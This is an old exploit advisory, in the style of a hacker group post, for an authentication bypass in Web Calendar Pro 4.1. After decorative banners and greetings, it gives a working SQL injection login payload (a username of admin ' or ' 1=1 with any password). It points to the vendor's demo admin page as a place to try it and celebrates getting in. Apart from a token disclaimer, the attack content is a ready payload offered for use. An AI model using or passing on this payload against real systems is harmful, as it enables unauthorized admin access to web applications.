Web Calendar 4.1 (Auth Bypass) SQL Injection Vulnerability
2008-11-27 03:00:07***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ Web Calendar Pro 4.1 (Auth Bypass) SQL Injection Vulnerability ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek ) : : :
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦
¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦
¦ From : MoroCCo ¦ ¦ ¦
¦ Script : http://www.web-calendar-pro.com ¦ ¦ ![ ]! ¦
¦ Download : http://www.web-calendar-pro.com/order-now.html ¦ ¦ ¦
¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦
¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦
¦ From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
¦ Remember : ¦
¦ ------------- ¦
¦ ¦
¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦
¦ ¦
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
This is a simple (Auth Bypass) :)
just login with this informations :
Username : admin ' or ' 1=1
Password : Cyber-Zone or any thing
This is a demo To Try :
http://demo.web-calendar-pro.com/admin.php
Yeaaaaaaaaaaaah Loged In :)
Fi Khater Alfarkha dyali :)
Raha Nayda Nooood
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.